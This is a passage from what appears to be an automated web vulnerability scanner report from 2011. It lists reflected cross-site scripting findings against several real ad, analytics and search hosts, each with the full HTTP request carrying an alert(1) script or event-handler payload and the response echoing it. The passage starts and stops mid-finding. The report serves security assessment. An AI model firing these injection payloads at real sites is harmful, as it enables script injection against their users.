The value of the UIT request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 734d6"-alert(1)-"39b801b9989 was submitted in the UIT parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/2030060152?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G734d6"-alert(1)-"39b801b9989&TargetID=28253488&AN=2030060152&PG=INVSRQ&ASID=5ce48c628db348bd86a7cea7290e54ad HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4db02685bd604; i_1=33:1391:835:0:0:40771:1303842976:B2|33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 26 Apr 2011 18:41:20 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1681

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
/ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303843280**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G734d6"-alert(1)-"39b801b9989&TargetID=28253488&AN=2030060152&PG=INVSRQ&ASID=5ce48c628db348bd86a7cea7290e54ad">
...[SNIP]...

5.98. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/2030060152 [click parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/2030060152

Issue detail

The value of the click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5f21b"-alert(1)-"3bd3b22176f was submitted in the click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/2030060152?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!5f21b"-alert(1)-"3bd3b22176f&&PID=8479898&UIT=G&TargetID=28253488&AN=2030060152&PG=INVSRQ&ASID=5ce48c628db348bd86a7cea7290e54ad HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4db02685bd604; i_1=33:1391:835:0:0:40771:1303842976:B2|33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 26 Apr 2011 18:41:02 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1681

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
rc="'+wsod.proto+'//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303843262**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!5f21b"-alert(1)-"3bd3b22176f&&PID=8479898&UIT=G&TargetID=28253488&AN=2030060152&PG=INVSRQ&ASID=5ce48c628db348bd86a7cea7290e54ad">
...[SNIP]...

5.99. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/2030060152 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/2030060152

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8d2bd"-alert(1)-"c32921f3ace was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/2030060152?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=28253488&AN=2030060152&PG=INVSRQ&ASID=5ce48c628db348bd86a7cea7290e54ad&8d2bd"-alert(1)-"c32921f3ace=1 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4db02685bd604; i_1=33:1391:835:0:0:40771:1303842976:B2|33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 26 Apr 2011 18:41:55 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1684

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=28253488&AN=2030060152&PG=INVSRQ&ASID=5ce48c628db348bd86a7cea7290e54ad&8d2bd"-alert(1)-"c32921f3ace=1">
...[SNIP]...

5.100. http://api.bing.com/qsonhs.aspx [q parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bing.com
Path:   /qsonhs.aspx

Issue detail

The value of the q request parameter is copied into the HTML document as plain text between tags. The payload 412b0<img%20src%3da%20onerror%3dalert(1)>167ebef1169 was submitted in the q parameter. This input was echoed as 412b0<img src=a onerror=alert(1)>167ebef1169 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /qsonhs.aspx?form=MSN005&q=412b0<img%20src%3da%20onerror%3dalert(1)>167ebef1169 HTTP/1.1
Host: api.bing.com
Proxy-Connection: keep-alive
Referer: http://www.msn.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110423; _UR=; s_nr=1303567291710; s_vnum=1306159291712%26vn%3D1; SRCHD=MS=1744674&SM=1&D=1740336&AF=NOFORM; MUID=B506C07761D7465D924574124E3C14DF

Response

HTTP/1.1 200 OK
Content-Length: 79
Content-Type: application/json; charset=utf-8
X-Akamai-TestID: dc4cad0d277c4e69b70a6ff416da300c
Date: Tue, 26 Apr 2011 18:36:47 GMT
Connection: close

{"AS":{"Query":"412b0<img src=a onerror=alert(1)>167ebef1169","FullResults":1}}

5.101. http://ar.voicefive.com/b/rc.pli [func parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /b/rc.pli

Issue detail

The value of the func request parameter is copied into the HTML document as plain text between tags. The payload f7a00<script>alert(1)</script>2b050c4882a was submitted in the func parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /b/rc.pli?func=COMSCORE.BMX.Broker.handleInteractionf7a00<script>alert(1)</script>2b050c4882a&n=ar_int_p92429851&1303842996956 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/NYC/iview/296638382/direct;;wi.300;hi.250/01?click=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p97174789=exp=24&initExp=Sun Apr 24 12:09:48 2011&recExp=Tue Apr 26 14:21:11 2011&prad=253732015&arc=178113848&; ar_p92429851=exp=1&initExp=Tue Apr 26 18:36:13 2011&recExp=Tue Apr 26 18:36:13 2011&prad=296638382&arc=200925855&; BMX_3PC=1; UID=875e3f1e-184.84.247.65-1303349046; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1303842976%2E104%2Cwait%2D%3E10000%2C

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 26 Apr 2011 18:36:29 GMT
Content-Type: application/x-javascript
Connection: close
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 83

COMSCORE.BMX.Broker.handleInteractionf7a00<script>alert(1)</script>2b050c4882a("");

5.102. http://b.scorecardresearch.com/beacon.js [c1 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c1 request parameter is copied into the HTML document as plain text between tags. The payload 595c5<script>alert(1)</script>e3e814fd6cc was submitted in the c1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=3595c5<script>alert(1)</script>e3e814fd6cc&c2=6035338&c3=%EBuy!&c4=%ECid!&c5=62431291&c6=& HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N5506.MSN/B5070033.105;sz=954x60;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00049/120000000000044726.1?!&&PID=8568160&UIT=G&TargetID=37577241&AN=1747665210&PG=INVPFO&ASID=8a0f1b24b0e94ac698dd5d301aea1010&destination=;ord=1747665210?
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Tue, 03 May 2011 18:39:44 GMT
Date: Tue, 26 Apr 2011 18:39:44 GMT
Connection: close
Content-Length: 1250

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
E.purge=function(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"3595c5<script>alert(1)</script>e3e814fd6cc", c2:"6035338", c3:".uy!", c4:".id!", c5:"62431291", c6:"", c10:"", c15:"", c16:"", r:""});



5.103. http://b.scorecardresearch.com/beacon.js [c2 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c2 request parameter is copied into the HTML document as plain text between tags. The payload 66376<script>alert(1)</script>fbc5d350fe7 was submitted in the c2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=3&c2=603533866376<script>alert(1)</script>fbc5d350fe7&c3=%EBuy!&c4=%ECid!&c5=62431291&c6=& HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N5506.MSN/B5070033.105;sz=954x60;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00049/120000000000044726.1?!&&PID=8568160&UIT=G&TargetID=37577241&AN=1747665210&PG=INVPFO&ASID=8a0f1b24b0e94ac698dd5d301aea1010&destination=;ord=1747665210?
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Tue, 03 May 2011 18:39:45 GMT
Date: Tue, 26 Apr 2011 18:39:45 GMT
Connection: close
Content-Length: 1250

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
on(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"3", c2:"603533866376<script>alert(1)</script>fbc5d350fe7", c3:".uy!", c4:".id!", c5:"62431291", c6:"", c10:"", c15:"", c16:"", r:""});



5.104. http://b.scorecardresearch.com/beacon.js [c3 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c3 request parameter is copied into the HTML document as plain text between tags. The payload a0acc<script>alert(1)</script>2c22c5ef1fd was submitted in the c3 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=3&c2=6035338&c3=%EBuy!a0acc<script>alert(1)</script>2c22c5ef1fd&c4=%ECid!&c5=62431291&c6=& HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N5506.MSN/B5070033.105;sz=954x60;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00049/120000000000044726.1?!&&PID=8568160&UIT=G&TargetID=37577241&AN=1747665210&PG=INVPFO&ASID=8a0f1b24b0e94ac698dd5d301aea1010&destination=;ord=1747665210?
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Tue, 03 May 2011 18:39:46 GMT
Date: Tue, 26 Apr 2011 18:39:46 GMT
Connection: close
Content-Length: 1250

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
ar c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"3", c2:"6035338", c3:".uy!a0acc<script>alert(1)</script>2c22c5ef1fd", c4:".id!", c5:"62431291", c6:"", c10:"", c15:"", c16:"", r:""});



5.105. http://b.scorecardresearch.com/beacon.js [c4 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c4 request parameter is copied into the HTML document as plain text between tags. The payload 2724d<script>alert(1)</script>ef3e74934bc was submitted in the c4 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=3&c2=6035338&c3=%EBuy!&c4=%ECid!2724d<script>alert(1)</script>ef3e74934bc&c5=62431291&c6=& HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N5506.MSN/B5070033.105;sz=954x60;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00049/120000000000044726.1?!&&PID=8568160&UIT=G&TargetID=37577241&AN=1747665210&PG=INVPFO&ASID=8a0f1b24b0e94ac698dd5d301aea1010&destination=;ord=1747665210?
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Tue, 03 May 2011 18:39:46 GMT
Date: Tue, 26 Apr 2011 18:39:46 GMT
Connection: close
Content-Length: 1250

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"3", c2:"6035338", c3:".uy!", c4:".id!2724d<script>alert(1)</script>ef3e74934bc", c5:"62431291", c6:"", c10:"", c15:"", c16:"", r:""});



5.106. http://b.scorecardresearch.com/beacon.js [c5 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c5 request parameter is copied into the HTML document as plain text between tags. The payload 41c00<script>alert(1)</script>f9b5dad6c03 was submitted in the c5 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=3&c2=6035338&c3=%EBuy!&c4=%ECid!&c5=6243129141c00<script>alert(1)</script>f9b5dad6c03&c6=& HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N5506.MSN/B5070033.105;sz=954x60;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00049/120000000000044726.1?!&&PID=8568160&UIT=G&TargetID=37577241&AN=1747665210&PG=INVPFO&ASID=8a0f1b24b0e94ac698dd5d301aea1010&destination=;ord=1747665210?
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Tue, 03 May 2011 18:39:47 GMT
Date: Tue, 26 Apr 2011 18:39:47 GMT
Connection: close
Content-Length: 1250

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"3", c2:"6035338", c3:".uy!", c4:".id!", c5:"6243129141c00<script>alert(1)</script>f9b5dad6c03", c6:"", c10:"", c15:"", c16:"", r:""});



5.107. http://b.scorecardresearch.com/beacon.js [c6 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c6 request parameter is copied into the HTML document as plain text between tags. The payload 98717<script>alert(1)</script>403ae54048e was submitted in the c6 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=3&c2=6035338&c3=%EBuy!&c4=%ECid!&c5=62431291&c6=98717<script>alert(1)</script>403ae54048e& HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N5506.MSN/B5070033.105;sz=954x60;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00049/120000000000044726.1?!&&PID=8568160&UIT=G&TargetID=37577241&AN=1747665210&PG=INVPFO&ASID=8a0f1b24b0e94ac698dd5d301aea1010&destination=;ord=1747665210?
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Tue, 03 May 2011 18:39:47 GMT
Date: Tue, 26 Apr 2011 18:39:47 GMT
Connection: close
Content-Length: 1250

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"3", c2:"6035338", c3:".uy!", c4:".id!", c5:"62431291", c6:"98717<script>alert(1)</script>403ae54048e", c10:"", c15:"", c16:"", r:""});



5.108. http://cdn.widgetserver.com/syndication/json/i/077f25c8-0348-4215-9539-57b2ff17f13b/iv/15/n/code/nv/4/p/2/r/621004a9-a717-4271-bd6a-b454b74a1d68/rv/101/t/0ecb188b389ef47932686132b264ecdcbd658d2a0000012f8ab32f74/u/2/ [REST URL parameter 18]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.widgetserver.com
Path:   /syndication/json/i/077f25c8-0348-4215-9539-57b2ff17f13b/iv/15/n/code/nv/4/p/2/r/621004a9-a717-4271-bd6a-b454b74a1d68/rv/101/t/0ecb188b389ef47932686132b264ecdcbd658d2a0000012f8ab32f74/u/2/

Issue detail

The value of REST URL parameter 18 is copied into the HTML document as plain text between tags. The payload 567db<img%20src%3da%20onerror%3dalert(1)>4321673800c was submitted in the REST URL parameter 18. This input was echoed as 567db<img src=a onerror=alert(1)>4321673800c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /syndication/json/i/077f25c8-0348-4215-9539-57b2ff17f13b/iv/15/n/code/nv/4/p/2/r/621004a9-a717-4271-bd6a-b454b74a1d68/rv/101/t/0ecb188b389ef47932686132b264ecdcbd658d2a0000012f8ab32f74567db<img%20src%3da%20onerror%3dalert(1)>4321673800c/u/2/?callback=WIDGETBOX.subscriber.Main.onWidgetInfoResponse HTTP/1.1
Host: cdn.widgetserver.com
Proxy-Connection: keep-alive
Referer: http://www.widgetbox.com/list/most_popular
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript;charset=UTF-8
Date: Tue, 26 Apr 2011 21:51:09 GMT
Expires: Fri, 29 Apr 2011 21:50:09 GMT
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Server: Apache/2.2.3 (Red Hat)
Vary: Accept-Encoding
Content-Length: 3871

WIDGETBOX.subscriber.Main.onWidgetInfoResponse({"widgets":[{"enabledState":"0","initParams":"target4=http%3A%2F%2Fwww.widgetbox.com%2Faffiliate%2F315%2F%3Fr%3D%2Fmobile%2Fmake%2F&target3=http%3A%2F%2F
...[SNIP]...
romGalleryPK":"","sendsMessages":false,"isAdEnabled":false,"adPlacement":"BRH","categories":"","thumbFilePath":"/images/no-thumb.gif"}],"token":"0ecb188b389ef47932686132b264ecdcbd658d2a0000012f8ab32f74567db<img src=a onerror=alert(1)>4321673800c"});

5.109. http://cdn.widgetserver.com/syndication/json/i/077f25c8-0348-4215-9539-57b2ff17f13b/iv/15/n/code/nv/4/p/2/r/621004a9-a717-4271-bd6a-b454b74a1d68/rv/101/t/0ecb188b389ef47932686132b264ecdcbd658d2a0000012f8ab32f74/u/2/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://cdn.widgetserver.com
Path:   /syndication/json/i/077f25c8-0348-4215-9539-57b2ff17f13b/iv/15/n/code/nv/4/p/2/r/621004a9-a717-4271-bd6a-b454b74a1d68/rv/101/t/0ecb188b389ef47932686132b264ecdcbd658d2a0000012f8ab32f74/u/2/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 74b03<a>2abf9f455e2 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /syndication/json/i/077f25c8-0348-4215-9539-57b2ff17f13b74b03<a>2abf9f455e2/iv/15/n/code/nv/4/p/2/r/621004a9-a717-4271-bd6a-b454b74a1d68/rv/101/t/0ecb188b389ef47932686132b264ecdcbd658d2a0000012f8ab32f74/u/2/?callback=WIDGETBOX.subscriber.Main.onWidgetInfoResponse HTTP/1.1
Host: cdn.widgetserver.com
Proxy-Connection: keep-alive
Referer: http://www.widgetbox.com/list/most_popular
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: application/x-javascript;charset=UTF-8
Date: Tue, 26 Apr 2011 21:48:26 GMT
Expires: Sun, 7 May 1995 12:00:00 GMT
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Pragma: no-cache
Server: Apache/2.2.3 (Red Hat)
